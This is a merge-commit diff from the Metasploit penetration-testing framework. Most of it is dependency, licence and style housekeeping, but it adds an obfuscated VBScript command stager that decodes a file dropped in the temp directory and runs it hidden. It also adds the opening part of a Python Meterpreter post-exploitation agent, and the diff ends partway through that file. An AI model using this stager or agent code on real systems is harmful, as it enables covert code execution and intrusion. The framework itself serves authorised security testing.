Merge branch 'rapid7' into cleanup/remove-id-tags

Conflicts:
	lib/msf/core/payload/osx/bundleinject.rb
	lib/msf/core/payload/windows/dllinject.rb
	lib/msf/core/payload/windows/exec.rb
	lib/msf/core/payload/windows/loadlibrary.rb
	lib/msf/core/payload/windows/reflectivedllinject.rb
	lib/msf/core/payload/windows/x64/reflectivedllinject.rb
	scripts/meterpreter/netenum.rb

.gitignore

@@ -1,10 +1,9 @@
 .bundle
 # Rubymine project directory
 .idea
-# Portable ruby version files for rvm
-.ruby-gemset
-.ruby-version
-# RVM control file
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
 # YARD cache directory
 .yardoc
@@ -40,3 +39,5 @@ tags
 *.orig
 *.rej
 *~
+# Ignore backups of retabbed files
+*.notab

.mailmap

@@ -27,6 +27,8 @@ wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.
 
+Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
+Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>

.ruby-gemset

@@ -0,0 +1 @@
+metasploit-framework

.ruby-version

@@ -0,0 +1 @@
+ruby-1.9.3-p448

CONTRIBUTING.md

@@ -36,3 +36,9 @@ Pull requests tend to be very collaborative for Metasploit -- do not be
 surprised if your pull request to rapid7/metasploit-framework triggers a
 pull request back to your own fork. In this way, we can isolate working
 changes before landing your PR to the Metasploit master branch.
+
+To save yourself the embarrassment of committing common errors, you will
+want to symlink the `msftidy.rb` utility to your pre-commit hooks by
+running `ln -s ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit`
+from the top-level directory of your metasploit-framework clone. This
+will prevent you from committing modules that raise WARNINGS or ERRORS.

COPYING

@@ -11,7 +11,7 @@ are permitted provided that the following conditions are met:
 	  this list of conditions and the following disclaimer in the documentation
 	  and/or other materials provided with the distribution.
 
-    * Neither the name of Rapid7 LLC nor the names of its contributors
+    * Neither the name of Rapid7, Inc. nor the names of its contributors
 	  may be used to endorse or promote products derived from this software
 	  without specific prior written permission.
 
@@ -30,7 +30,7 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
 The Metasploit Framework is provided under the 3-clause BSD license above.
 
-The copyright on this package is held by Rapid7 LLC.
+The copyright on this package is held by Rapid7, Inc.
 
 This license does not apply to several components within the Metasploit
 Framework source tree.  For more details see the LICENSE file.

Gemfile

@@ -10,17 +10,20 @@ gem 'msgpack'
 gem 'nokogiri'
 # Needed by anemone crawler
 gem 'robots'
+# Needed by db.rb and Msf::Exploit::Capture
+gem 'packetfu', '1.1.9'
 
 group :db do
 	# Needed for Msf::DbManager
 	gem 'activerecord'
 	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.14.3'
+	gem 'metasploit_data_models', '~> 0.16.6'
 	# Needed for module caching in Mdm::ModuleDetails
 	gem 'pg', '>= 0.11'
 end
 
 group :pcap do
+  gem 'network_interface', '~> 0.0.1'
 	# For sniffer and raw socket modules
 	gem 'pcaprub'
 end
@@ -38,7 +41,7 @@ group :development, :test do
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
 	# running documentation generation tasks and rspec tasks
-	gem 'rake'
+	gem 'rake', '>= 10.0.0'
 end
 
 group :test do
@@ -48,11 +51,10 @@ group :test do
 	gem 'database_cleaner'
 	# testing framework
 	gem 'rspec', '>= 2.12'
-	# add matchers from shoulda, such as query_the_database, which is useful for
-	# testing that the Msf::DBManager activation is respected.
 	gem 'shoulda-matchers'
 	# code coverage for tests
 	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
 	gem 'simplecov', '0.5.4', :require => false
 	# Manipulate Time.now in specs
 	gem 'timecop'

Gemfile.lock

@@ -1,60 +1,58 @@
 GEM
   remote: http://rubygems.org/
   specs:
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
+    activemodel (3.2.14)
+      activesupport (= 3.2.14)
       builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
+    activerecord (3.2.14)
+      activemodel (= 3.2.14)
+      activesupport (= 3.2.14)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
+    activesupport (3.2.14)
+      i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
     arel (3.0.2)
-    bourne (1.4.0)
-      mocha (~> 0.13.2)
     builder (3.0.4)
-    database_cleaner (0.9.1)
-    diff-lcs (1.2.2)
+    database_cleaner (1.1.1)
+    diff-lcs (1.2.4)
     factory_girl (4.2.0)
       activesupport (>= 3.0.0)
-    i18n (0.6.1)
-    json (1.7.7)
-    metaclass (0.0.1)
-    metasploit_data_models (0.14.3)
+    i18n (0.6.5)
+    json (1.8.0)
+    metasploit_data_models (0.16.6)
       activerecord (>= 3.2.13)
       activesupport
       pg
-    mocha (0.13.3)
-      metaclass (~> 0.0.1)
-    msgpack (0.5.4)
+    mini_portile (0.5.1)
+    msgpack (0.5.5)
     multi_json (1.0.4)
-    nokogiri (1.5.9)
+    network_interface (0.0.1)
+    nokogiri (1.6.0)
+      mini_portile (~> 0.5.0)
+    packetfu (1.1.9)
     pcaprub (0.11.3)
-    pg (0.15.1)
-    rake (10.0.4)
-    redcarpet (2.2.2)
+    pg (0.16.0)
+    rake (10.1.0)
+    redcarpet (3.0.0)
     robots (0.10.1)
-    rspec (2.13.0)
-      rspec-core (~> 2.13.0)
-      rspec-expectations (~> 2.13.0)
-      rspec-mocks (~> 2.13.0)
-    rspec-core (2.13.1)
-    rspec-expectations (2.13.0)
+    rspec (2.14.1)
+      rspec-core (~> 2.14.0)
+      rspec-expectations (~> 2.14.0)
+      rspec-mocks (~> 2.14.0)
+    rspec-core (2.14.5)
+    rspec-expectations (2.14.2)
       diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.13.0)
-    shoulda-matchers (1.5.2)
+    rspec-mocks (2.14.3)
+    shoulda-matchers (2.3.0)
       activesupport (>= 3.0.0)
-      bourne (~> 1.3)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
-    timecop (0.6.1)
+    timecop (0.6.3)
     tzinfo (0.3.37)
-    yard (0.8.5.2)
+    yard (0.8.7)
 
 PLATFORMS
   ruby
@@ -65,12 +63,14 @@ DEPENDENCIES
   database_cleaner
   factory_girl (>= 4.1.0)
   json
-  metasploit_data_models (~> 0.14.3)
+  metasploit_data_models (~> 0.16.6)
   msgpack
+  network_interface (~> 0.0.1)
   nokogiri
+  packetfu (= 1.1.9)
   pcaprub
   pg (>= 0.11)
-  rake
+  rake (>= 10.0.0)
   redcarpet
   robots
   rspec (>= 2.12)

HACKING

@@ -9,8 +9,8 @@ Code Style
 In order to maintain consistency and readability, we ask that you
 adhere to the following style guidelines:
 
- - Hard tabs, not spaces
- - Try to keep your lines under 100 columns (assuming four-space tabs)
+ - Standard Ruby two-space soft tabs, not hard tabs.
+ - Try to keep your lines under 100 columns (assuming two-space tabs)
  - do; end instead of {} for a block
  - Always use str[0,1] instead of str[0]
    (This avoids a known ruby 1.8/1.9 incompatibility.)
@@ -37,9 +37,10 @@ need user input, you can either register an option or expose an
 interactive session type specific for the type of exploit.
 
 3. Don't use "sleep". It has been known to cause issues with
-multi-threaded programs on various platforms. Instead, we use
-"select(nil, nil, nil, <time>)" throughout the framework. We have
-found this works around the underlying issue.
+multi-threaded programs on various platforms running an older version of
+Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
+Rex.sleep() throughout the framework. We have found this works around
+the underlying issue.
 
 4. Always use Rex sockets, not ruby sockets.  This includes
 third-party libraries such as Net::Http.  There are several very good

README.md

@@ -47,7 +47,7 @@ pull request. For slightly more info, see
 [Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
 
 
-[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
 [unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"

data/exploits/cmdstager/vbs_b64_noquot

@@ -0,0 +1,49 @@
+echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
+echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
+echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
+echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
+echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
+echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
+echo tempString  = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
+echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
+echo Set wshShell = CreateObject(scriptShell) >>decode_stub
+echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
+echo Set fs = CreateObject(scriptingFS) >>decode_stub
+echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
+echo data = Replace(data, vbCrLf, nil) >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo emptyString >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

data/exploits/cve-2013-1488/META-INF/services/java.lang.Object

@@ -0,0 +1 @@
+com.sun.script.javascript.RhinoScriptEngine

data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver

@@ -0,0 +1,2 @@
+FakeDriver
+FakeDriver2

data/meterpreter/ext_server_stdapi.py

@@ -0,0 +1,865 @@
+import ctypes
+import fnmatch
+import getpass
+import os
+import platform
+import shlex
+import shutil
+import socket
+import struct
+import subprocess
+import sys
+
+has_windll = hasattr(ctypes, 'windll')
+
+try:
+	import pty
+	has_pty = True
+except ImportError:
+	has_pty = False
+
+try:
+	import pwd
+	has_pwd = True
+except ImportError:
+	has_pwd = False
+
+try:
+	import termios
+	has_termios = True
+except ImportError:
+	has_termios = False
+
+try:
+	import _winreg as winreg
+	has_winreg = True
+except ImportError:
+	has_winreg = False
+
+class PROCESSENTRY32(ctypes.Structure):
+	_fields_ = [("dwSize", ctypes.c_uint32),
+		("cntUsage", ctypes.c_uint32),
+		("th32ProcessID", ctypes.c_uint32),
+		("th32DefaultHeapID", ctypes.c_void_p),
+		("th32ModuleID", ctypes.c_uint32),
+		("cntThreads", ctypes.c_uint32),
+		("th32ParentProcessID", ctypes.c_uint32),
+		("thPriClassBase", ctypes.c_int32),
+		("dwFlags", ctypes.c_uint32),
+		("szExeFile", (ctypes.c_char * 260))]
+
+class SYSTEM_INFO(ctypes.Structure):
+	_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
+		("wReserved", ctypes.c_uint16),
+		("dwPageSize", ctypes.c_uint32),
+		("lpMinimumApplicationAddress", ctypes.c_void_p),
+		("lpMaximumApplicationAddress", ctypes.c_void_p),
+		("dwActiveProcessorMask", ctypes.c_uint32),
+		("dwNumberOfProcessors", ctypes.c_uint32),
+		("dwProcessorType", ctypes.c_uint32),
+		("dwAllocationGranularity", ctypes.c_uint32),
+		("wProcessorLevel", ctypes.c_uint16),
+		("wProcessorRevision", ctypes.c_uint16),]
+
+class SID_AND_ATTRIBUTES(ctypes.Structure):
+	_fields_ = [("Sid", ctypes.c_void_p),
+		("Attributes", ctypes.c_uint32),]
+
+##
+# STDAPI
+##
+
+#
+# TLV Meta Types
+#
+TLV_META_TYPE_NONE =       (   0   )
+TLV_META_TYPE_STRING =     (1 << 16)
+TLV_META_TYPE_UINT =       (1 << 17)
+TLV_META_TYPE_RAW =        (1 << 18)
+TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_COMPRESSED = (1 << 29)
+TLV_META_TYPE_GROUP =      (1 << 30)
+TLV_META_TYPE_COMPLEX =    (1 << 31)
+# not defined in original
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+
+#
+# TLV Specific Types
+#
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+
+##
+# General
+##
+TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
+TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
+TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
+TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
+
+##
+# Fs
+##
+TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
+TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
+TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
+TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
+TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
+
+TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
+
+TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
+TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
+TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
+TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
+
+##
+# Net
+##
+TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
+TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
+
+TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
+TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
+TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
+TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
+
+TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
+TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
+TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
+TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
+
+TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
+TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
+TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
+
+# Socket
+TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
+TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
+
+TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
+
+# Registry
+TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
+TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
+TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
+TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
+TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
+TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
+TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
+
+# Config
+TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
+
+DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
+
+# Process
+TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
+TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
+TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
+TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
+TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
+TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
+TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
+TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
+TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
+TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
+TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
+TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
+TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
+TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
+
+TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
+TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
+TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
+TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
+TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
+TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
+
+TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
+TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
+TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
+TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
+TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
+
+TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
+TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
+TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
+TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
+
+##
+# Ui
+##
+TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
+TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
+TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
+
+##
+# Event Log
+##
+TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
+TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
+
+TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
+TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
+
+TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
+TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
+TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
+TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
+TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
+TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
+TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
+
+##
+# Power
+##
+TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
+TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
+
+##
+# Sys
+##
+PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
+PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
+PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
+PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
+
+PROCESS_ARCH_UNKNOWN = 0
+PROCESS_ARCH_X86 = 1
+PROCESS_ARCH_X64 = 2
+PROCESS_ARCH_IA64 = 3
+
+##
+# Errors
+##
+ERROR_SUCCESS = 0
+# not defined in original C implementation
+ERROR_FAILURE = 1
+
+# Special return value to match up with Windows error codes for network
+# errors.
+ERROR_CONNECTION_ERROR = 10000
+
+def get_stat_buffer(path):
+	si = os.stat(path)
+	rdev = 0
+	if hasattr(si, 'st_rdev'):
+		rdev = si.st_rdev
+	blksize = 0
+	if hasattr(si, 'st_blksize'):
+		blksize = si.st_blksize
+	blocks = 0
+	if hasattr(si, 'st_blocks'):
+		blocks = si.st_blocks
+	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
+	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
+	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
+	st_buf += struct.pack('<II', blksize, blocks)
+	return st_buf
+
+def windll_GetNativeSystemInfo():
+	if not has_windll:
+		return None
+	sysinfo = SYSTEM_INFO()
+	ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
+	return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
+
+@meterpreter.register_function
+def channel_create_stdapi_fs_file(request, response):
+	fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
+	if fmode:
+		fmode = fmode['value']
+		fmode = fmode.replace('bb', 'b')
+	else:
+		fmode = 'rb'
+	file_h = open(fpath, fmode)
+	channel_id = meterpreter.add_channel(file_h)
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def channel_create_stdapi_net_tcp_client(request, response):
+	host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
+	port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
+	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
+	local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
+	retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
+	connected = False
+	for i in range(retries + 1):
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.settimeout(3.0)
+		if local_host.get('value') and local_port.get('value'):
+			sock.bind((local_host['value'], local_port['value']))
+		try:
+			sock.connect((host, port))
+			connected = True
+			break
+		except:
+			pass
+	if not connected:
+		return ERROR_CONNECTION_ERROR, response
+	channel_id = meterpreter.add_channel(sock)
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_config_getuid(request, response):
+	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_config_sysinfo(request, response):
+	uname_info = platform.uname()
+	response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
+	response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
+	arch = uname_info[4]
+	if has_windll:
+		arch = windll_GetNativeSystemInfo()
+		if arch == PROCESS_ARCH_IA64:
+			arch = 'IA64'
+		elif arch == PROCESS_ARCH_X64:
+			arch = 'x86_64'
+		elif arch == PROCESS_ARCH_X86:
+			arch = 'x86'
+		else:
+			arch = uname_info[4]
